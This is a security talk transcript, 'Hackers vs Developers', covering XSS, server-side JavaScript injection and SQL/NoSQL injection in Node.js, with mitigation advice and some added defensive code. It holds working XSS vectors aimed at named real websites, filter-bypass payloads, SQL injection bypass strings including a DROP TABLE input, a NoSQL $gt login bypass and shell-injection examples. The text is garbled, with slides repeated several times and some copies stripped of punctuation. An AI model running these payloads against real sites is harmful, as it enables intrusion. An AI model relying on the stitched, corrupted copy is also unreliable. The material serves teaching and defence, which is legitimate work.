Hackers vs Developers
TRANSCRIPT
Soumyasanto Sen, sitWDF
Hackers versus Developers: The GAME is ON
Introduction
Player 1: Hackers
• Expert: skillful, with a detailed understanding of some area, deeply, often scarily deeply
• Unsocial: don’t want to come out of the shell
• Breaker: hack apps
• Cool: people think that they are cool, and they think they are awesome
• Super Power: they believe that they can be Masters of the Universe
VS
Player 2: Developers
• Controller: can use a lot of systems and languages and get them to talk to each other
• Social: true and broad professionals; work with people and communicate well
• Builder: create apps
• Boring: there are other, more important things in life than just coding
• Super Power: they believe they can change this world
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript’s Built-In Function(s)
decodeURI(): decodes an encoded URI
http://t.home.news.cn/sp/Index.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic=xxxxxxxxyyyyy<img
Possibilities
• "-confirm(1)-"
• "-confirm`1`-"
http://t.home.news.cn/sp/Index.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="-confirm(1)-"
The topic parameter is reflected unencoded into an inline script, so the payload lands inside the string literal:
var topic = decodeURI(""-confirm(1)-"");
var topic = decodeURI(""-confirm`1`-"");
The injected quote closes the literal and confirm(1) is evaluated as part of the expression.
Hacking looks ‘Simple’
XSS - Cross Site Scripting
JavaScript’s Built-In Function(s)
replace() (JS String replace method): returns a new string with the matches of a pattern replaced
http://www.zaobao.com.sg/search/site/xxxxxxxxyyyyy<img
Possibilities
http://www.zaobao.com.sg/search/site/"-confirm(1)-"
http://www.zaobao.com.sg/search/site/")confirm(1)("
http://www.zaobao.com.sg/search/site/")confirm(1) (does not work, because the terminating characters are filtered)
Easy Rules
Preventions
• XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
• HTML5 Security Cheat Sheet
• Secure Coding Practice Guidelines
• Use clean URLs: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today
• Sanitize inputs: a must against XSS
• Control access: http://www.site.com/phpmyadmin gave us access to the complete database. No injection, nothing.
• Validate input
• Use white-listing
• Switch off error display
Easy Rules
Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
(Developers love their code just like it’s their child.)
“Do not trust anything, ever, especially when it comes to user input.”
“Security is about layers. It has to be, because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION
Hacking looks ‘Simple’
Even for
Breaking SuccessFactors’s XSS Filter
"-confirm(1)-" was enough to break SAP’s SuccessFactors XSS filter, and with it hundreds of web applications turned out to be vulnerable
https://jobs.sap.com/talentcommunity/login?returnurl=xxxxxxxxyyyyy<img
Possibilities
• <script><script>alert(1)</script>
• "-confirm(1)-"
https://jobs.sap.com/talentcommunity/login?returnurl=<script><script>alert(1)</script>
Next Vector: <img src=x onerror=alert(1)>
Next Vector: <img src=x onerror=confirm(1)>
Next Vector: <a href="javascript:confirm(1)">click</a>
Next Vectors
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via `url` contexts (e.g. an <img>’s src and/or an anchor’s href attribute): implementation of `urlContextCleaner()`
Easy Filtering
External HTML Sanitizer
https://developers.google.com/caja
The Caja project includes an HTML sanitizer
Example
<script src="html-sanitizer-minified.js"></script>
<script>
function urlX(url) { if (/^https?:\/\//.test(url)) { return url } }
function idX(id) { return id }
// "<\/script>" inside the string keeps the HTML parser from closing this script block early
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX))
</script>
Node.js is a JavaScript runtime built on Chrome’s V8 JavaScript engine
Hacking in Node.js
Of Course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs
<s <onmouseover=alert(1)> <s onmouseover=alert(1)>This is a test</s>
<a href="javascript:J a V a S c R iPt:alert(1)" <s>>test</a>
(With any encoding)
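The `urlContextCleaner()` slide above names the check but not its body, and the javascript: URI bypasses just shown rely on mixed case, embedded whitespace and entity encoding surviving the filter. The following is an added example, not code from the deck or from any sanitizer project, of how such a cleaner can be written for values destined for src/href attributes. The names `urlContextCleaner`, `decodeEntities`, `NAMED_ENTITIES` and `ALLOWED_SCHEMES`, and the allow-list itself, are this example's own assumptions.

```javascript
// Added example, not from the slides: a URL-context cleaner for values that
// end up in <img src> or <a href>. Names (urlContextCleaner, decodeEntities,
// ALLOWED_SCHEMES) and the allow-list are assumptions of this example.

const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Named entities that matter for URL obfuscation (&colon; &Tab; &NewLine; &sol; are HTML5 entities).
const NAMED_ENTITIES = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
  colon: ':', Tab: '\t', NewLine: '\n', sol: '/',
};
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Decode numeric references (&#106; / &#x6a;, with or without ';') and the named ones above,
// because the HTML parser decodes them before the browser ever sees the URL.
function decodeEntities(s) {
  const fromCode = (n) => (n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromCode(parseInt(dec, 10)))
    .replace(/&([A-Za-z]+);/g, (m, name) => (hasOwn(NAMED_ENTITIES, name) ? NAMED_ENTITIES[name] : m));
}

// Returns the URL if it may be placed in a src/href attribute, otherwise null.
function urlContextCleaner(raw) {
  if (typeof raw !== 'string') return null;
  // 1. Undo entity encoding, then mimic the URL parser: tab/LF/CR are removed anywhere,
  //    leading and trailing C0 controls and spaces are trimmed.
  const url = decodeEntities(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  // 2. A scheme is everything before the first ':' unless '/', '?' or '#' comes first.
  const m = /^([^:/?#]*):/.exec(url);
  if (m === null) return url; // no scheme: a relative URL cannot start a script
  // 3. Drop whitespace/control characters left inside the scheme candidate, so
  //    "j a v a s c r i p t:" and "java\u0000script:" are both recognised as "javascript:".
  const scheme = m[1].replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase() + ':';
  return ALLOWED_SCHEMES.has(scheme) ? url : null;
}
```

The return value is still a raw URL: whatever writes it into HTML must attribute-encode it, the same way the Caja sanitizer above asks `urlX` for a verdict and then does the encoding itself. Protocol-relative URLs (`//host/path`) pass because they inherit the page's scheme; treat them as absolute and check the host if that is not wanted.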
Hacking in Node.js
Server Side JavaScript Injection
Simple JS command:
response.end("Ended Response")
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l <user input>"]
(child_process.exec hands the concatenated command line to /bin/sh -c, as the strace output shows, so shell metacharacters in the user input are interpreted by the shell)
Hacking in Node.js
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1-- ' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(user = Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}) (NoSQL)
username: {"$gt": ""}
password: {"$gt": ""}
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Substitute eval() with JSON.parse(): the code is no longer injectable
• Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js
Protection
SQL and NoSQL Injection Prevention
• Use parameterized SQL
var q = "SELECT name FROM books WHERE id = $1";
client.query(q, [3], function(err, result) { });
• PreparedStatements avoid/prevent SQL injection
PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL)
db.users.find({user: {$in: [user]}, pass: {$in: [pass]}})
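The `{"$gt": ""}` trick above works because a JSON body parser hands the handler whatever object the client sent, so `username` and `password` can arrive as operator objects rather than strings. Here is an added example (not code from the deck) that enforces string types and wraps the values in `$in` as the slide recommends, with a small stand-in for MongoDB's `$gt` / `$in` matching so the effect can be seen without a database. All names (`buildLoginFilter`, `naiveLoginFilter`, `matches`, `login`, `USERS`) and the sample documents are this example's own.

```javascript
// Added example, not from the slides: hardening a login lookup against the
// {"$gt": ""} operator injection. Names and sample data are assumptions.

function naiveLoginFilter(body) {
  // Vulnerable: the client's values go into the query unchanged, operator
  // objects included.
  return { username: body.username, password: body.password };
}

function buildLoginFilter(body) {
  const { username, password } = body || {};
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  // $in takes an array of literal values, so an operator object can no longer
  // be smuggled in as the comparison.
  return { username: { $in: [username] }, password: { $in: [password] } };
}

// Minimal evaluator for the operators involved: $gt compares (lexicographically
// for strings), $in tests membership, a plain value means equality.
function fieldMatches(cond, value) {
  if (cond !== null && typeof cond === 'object') {
    if ('$gt' in cond) return value > cond.$gt;
    if ('$in' in cond) return cond.$in.includes(value);
  }
  return cond === value;
}

function matches(filter, doc) {
  return Object.keys(filter).every((key) => fieldMatches(filter[key], doc[key]));
}

// Constructed sample collection (clear-text passwords only to keep the demo short).
const USERS = [
  { username: 'alice', password: 'correct horse' },
  { username: 'bob', password: 'battery staple' },
];

// Returns the usernames the filter matches; a login that returns anyone "succeeds".
function login(filterBuilder, body) {
  const filter = filterBuilder(body);
  return USERS.filter((user) => matches(filter, user)).map((user) => user.username);
}
```

Against the naive builder, `{"username": {"$gt": ""}, "password": {"$gt": ""}}` matches every document, because any non-empty string is greater than the empty string. The type check is the real fix; the `$in` wrapping on top of it follows the slide's advice and costs nothing.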
Positive Side
• Social Good: find solutions for social-benefit operations and emergencies
• Penetration Testing: to find vulnerabilities that an attacker could exploit
• Open Source: much open-source code is produced, tested and improved by hackers, usually in hackathons
Good Cause
Negative Side
Top 10 fears of 2015
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Source: Chapman University
Make a Difference
Source: Scott Hanselman
Who is the Winner?
A “Hacker” is a state of mind
A “Developer” is a state of function
Choice is Yours
Thank You
Soumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
• Sanitize inputs: a must for XSS
• Control access: http://www.site.com/phpmyadmin gave us access to the complete database. No injection, nothing.
• Validate input
• Use white-listing
• Switch off verbose errors (stack traces and database errors belong in the log, not in the response)
Easy Rules
Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
(Developers love their code just like it's their child.)
“Do not trust anything, ever, especially when it comes to user input.”
“Security is about layers. It has to be, because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION.
Hacking looks ‘Simple’, even for
Breaking SuccessFactors's XSS Filter
'-confirm(1)-' was enough to break SAP SuccessFactors's XSS filter, which left hundreds of web applications vulnerable.
https://jobs.sap.com/talentcommunity/login?returnurl=xxxxxxxxyyyyy<img
Possibilities:
• </script><script>alert(1)</script>
• -confirm(1)-
https://jobs.sap.com/talentcommunity/login?returnurl=</script><script>alert(1)</script>
Next vector: <img src=x onerror=alert(1)>
Next vector: <img src=x onerror=confirm(1)>
Next vector: <a href=javascript:confirm(1)>click</a>
Next vectors:
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)> (fires without any click when the tag also carries the open attribute: <details open ontoggle=confirm(1)>)
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via `url` contexts (e.g. an img's src and/or an anchor's href attribute): implementation of `urlContextCleaner()`
Easy Filtering
External HTML Sanitizer
https://developers.google.com/caja
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
  // URL policy: only http(s) URLs are kept, so the javascript: href is dropped
  function urlX(url) { if (/^https?:\/\//.test(url)) { return url; } }
  // id/name policy: pass-through
  function idX(id) { return id; }
  // "<\/script>" rather than "</script>": a literal "</script>" inside the string
  // would end the script block before the sanitizer ever ran
  alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX));
</script>
The sanitizer keeps the bold text and the http image, strips the javascript: href and removes the script element altogether.
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine.
Hacking in Node.js
Of course, XSS
Improper parsing of nested tags, and incomplete filtering of javascript: URIs:
<s <onmouseover=alert(1)> <s onmouseover=alert(1)>This is a test</s>
<a href=javascript:J a V a S c R iPt:alert(1) <s>>test</a>
(with any encoding)
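The filter failures above (tags nested inside tags, javascript: URIs that survive because of case, whitespace or character references) and the `urlContextCleaner()` slide are both about the same thing: the defence has to be chosen per output context, and a URL check has to normalise the way a browser does before it looks at the scheme. The block below is an added example, not code from the deck or from SAP, Caja or any Node.js library; `encodeForHtml`, `encodeForJsString`, `urlContextCleaner`, `renderLink`, `renderTopicScript` and every test input are this example's own assumptions.

```javascript
// Added example, not code from the deck: context-aware output encoding plus a
// URL-context cleaner of the kind the slide names urlContextCleaner(). The
// function names and all inputs below are this example's own assumptions.

// HTML body and quoted-attribute context: entity-encode the five characters
// that can change the parser's state. Attribute values must also be quoted.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context (var topic = decodeURI('...')): escape
// every non-alphanumeric character, so quotes, backticks, "</script" and line
// terminators can never end the string literal or the script block.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL context (img src, a href). Browsers decode character references and
// drop tab/LF/CR and leading control characters before looking at the
// scheme, so normalise the same way, then allow only http(s) and relative
// URLs. Returns null for anything else (javascript:, data:, vbscript:, ...).
function urlContextCleaner(url) {
  const u = String(url)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+/, '');
  const scheme = /^([a-z][a-z0-9+.\-]*):/i.exec(u);
  if (scheme && !/^https?$/i.test(scheme[1])) {
    return null;
  }
  return u;
}

// The two layers together for an anchor: first the URL policy, then
// attribute encoding of whatever survived it.
function renderLink(href, text) {
  const cleaned = urlContextCleaner(href);
  return '<a href="' + encodeForHtml(cleaned === null ? '#' : cleaned) + '">' +
         encodeForHtml(text) + '</a>';
}

// And the script context that the '-confirm(1)-' payloads break out of.
function renderTopicScript(topic) {
  return "var topic = decodeURI('" + encodeForJsString(topic) + "');";
}
```

The order inside `urlContextCleaner` matters: character references are decoded first so that `&#9;` becomes a tab that is then stripped, exactly as the browser would see it; checking the scheme against an allow-list is what makes the "any encoding" variants on the slide fail, whereas a deny-list of `javascript:` spellings never finishes.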
Hacking in Node.js
Server Side JavaScript Injection
A simple JS command, injected into input that the server passes to eval(), ends the response:
response.end("Ended Response")
Shell command injection through child_process.exec(), as seen in an strace of the server:
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l <user input>"], ...)
Hacking in Node.js
SQL and NoSQL Injection
Classic SQL injection bypass:
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1-- ' AND password = '')
select author from books where id=$id  ->  (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(user = Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password})  (NoSQL)
username[$gt]=
password[$gt]=
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Substitute JSON.parse() for eval(): the input is parsed as data instead of being run as code, so it is no longer injectable
• Use child_process.execFile or child_process.spawn instead of child_process.exec: no shell is involved, so the input cannot be turned into extra commands
Secure Node.js
Protection
SQL and NoSQL Injection Prevention
• Use parameterized SQL:
var q = 'SELECT name FROM books WHERE id = $1';
client.query(q, [3], function (err, result) { /* ... */ });
• Prepared statements avoid/prevent SQL injection:
PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL):
db.users.find({user: {$in: [user]}, pass: {$in: [pass]}})
(An operator object inside the $in array is not evaluated as an operator, so the $gt payload no longer matches; checking that user and pass are strings before building the query is the simpler and more general rule.)
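The NoSQL login on the slide, the `username[$gt]=&password[$gt]=` payload and both fixes, as an added example that is not code from the deck or from MongoDB: `parseFormBody`, the `find()`/`matches()` stand-in for the few query operators involved, the `users` sample collection and the three `login*` functions are this example's own assumptions, so it runs without a database.

```javascript
// Added example, not code from the deck: the db.users.find({username, password})
// login from the slide, the username[$gt]=&password[$gt]= payload, and two
// ways to close the hole. No MongoDB is needed: find() below is a tiny
// stand-in for the part of the query language this example touches, and the
// users collection is constructed sample data.
const users = [
  { username: 'alice', password: 'correct horse' },
  { username: 'bob', password: 'battery staple' },
];

// Stand-in for what a bracket-notation body parser (qs, behind Express's
// extended urlencoded parser) does with "username[$gt]=": the value becomes
// an object with an operator key instead of a string.
function parseFormBody(raw) {
  const out = {};
  for (const pair of raw.split('&')) {
    const [key, value = ''] = pair.split('=').map(decodeURIComponent);
    const m = /^([^\[]+)\[([^\]]+)\]$/.exec(key);
    if (m) {
      (out[m[1]] = out[m[1]] || {})[m[2]] = value;
    } else {
      out[key] = value;
    }
  }
  return out;
}

// Minimal query evaluator: plain values compare by equality; an object
// operand is an operator document ($gt, $ne, $in), as in MongoDB.
function matches(doc, query) {
  return Object.keys(query).every((field) => {
    const cond = query[field];
    const value = doc[field];
    if (cond !== null && typeof cond === 'object' && !Array.isArray(cond)) {
      return Object.keys(cond).every((op) => {
        if (op === '$gt') return value > cond.$gt;
        if (op === '$ne') return value !== cond.$ne;
        if (op === '$in') return cond.$in.includes(value);
        throw new Error('unsupported operator ' + op);
      });
    }
    return value === cond;
  });
}

function find(query) {
  return users.filter((doc) => matches(doc, query));
}

// Vulnerable: whatever the body parser produced goes straight into the query,
// so {$gt: ""} matches every non-empty string and the login succeeds for all.
function loginUnsafe(body) {
  return find({ username: body.username, password: body.password });
}

// The slide's fix: wrap each value in $in. An operator object inside the $in
// array is not evaluated as an operator (MongoDB rejects it; this stand-in
// compares it as a literal and finds no match).
function loginWithIn(body) {
  return find({ username: { $in: [body.username] }, password: { $in: [body.password] } });
}

// The more general rule: credentials must be strings; anything else is
// rejected before a query is built at all.
function loginSafe(body) {
  if (typeof body.username !== 'string' || typeof body.password !== 'string') {
    throw new TypeError('credentials must be strings');
  }
  return find({ username: body.username, password: body.password });
}
```

Feeding `parseFormBody('username[$gt]=&password[$gt]=')` to `loginUnsafe` returns every user in the collection, which is the authentication bypass; the same body gives `loginWithIn` no match and makes `loginSafe` throw before any query runs.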
Positive Side: Good Cause
• Social good: finding solutions for social-benefit operations and emergencies
• Penetration testing: finding the vulnerabilities an attacker could exploit
• Open source: much open-source code is produced, tested and improved by hackers, often at hackathons
Negative Side: Top 10 fears of 2015 (Source: Chapman University)
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Make Difference (Source: Scott Hanselman)
Who is the Winner?
A “Hacker” is a state of mind.
A “Developer” is a state of function.
Choice is Yours
Thank You
Soumyasanto Sen
@soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
